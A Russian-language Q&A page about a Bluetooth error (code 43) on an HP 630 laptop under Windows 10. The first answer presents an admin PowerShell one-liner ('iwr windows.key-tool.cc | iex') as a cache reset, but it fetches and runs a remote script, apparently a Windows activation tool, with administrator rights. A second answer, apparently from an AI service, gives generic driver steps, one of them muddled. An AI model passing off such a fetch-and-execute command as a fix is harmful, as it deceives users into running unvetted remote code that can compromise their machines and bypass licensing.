Не работает блютуз Hp 630
Не работает блютуз на hp 630 в виндовс 10, (код ошибки 43) при этом на виндовс 7 всë работает
Скорее всего надо сбросить кеш
Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:
iwr windows.key-tool.cc | iex
Нажать Enter.
(не путать с командной строкой).
В открывшемся окне нажать 1.
https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).
После выполнения команды закрыть все окна и перезагрузить ПК.
Ответ от RawMind AI:
Для решения проблемы с блютузом на HP 630 под Windows 10 можно попробовать следующие шаги:
1. Обновление драйверов:
- Откройте "Панель управления" -> "Устройства и принтеры".
- Найдите раздел с блютузом или Bluetooth адаптер.
- Правый клик по нему, выберите "Свойства", затем вкладку "Драйвер".
- Нажмите на кнопку "Обновить драйверы" и следуйте инструкциям.
2. Перезагрузка службы блютуз:
- Нажмите на кнопку "Отключить устройство" и подождите несколько секунд. Затем нажмите "Включить устройство".
3. Установка драйверов с сайта производителя:
- Перейдите на официальный сайт HP и найдите раздел для загрузки драйверов.
- Выберите модель ноутбука (HP 630) и операционную систему (Windows 10).
- Скачайте и установите последние версии драйверов.
4. Проверка настройок Windows:
- Правый клик по нему, выберите "Свойства", затем вкладку "Настройки".
- Убедитесь, что блютуз включен и настроены все необходимые параметры.
5. Проверка совместимости:
- Возможно, проблема связана с несовместимостью драйверов Windows 10 с вашим адаптером Bluetooth.
- Попробуйте установить обновления Windows через "Центр обновлений" и проверьте наличие обновлений для блютуз-адаптера.
Если эти шаги не помогли, возможно потребуется более детальная диагностика или обращение в службу поддержки HP.
На Виндовс 10 Не установлен драйвер Блютуз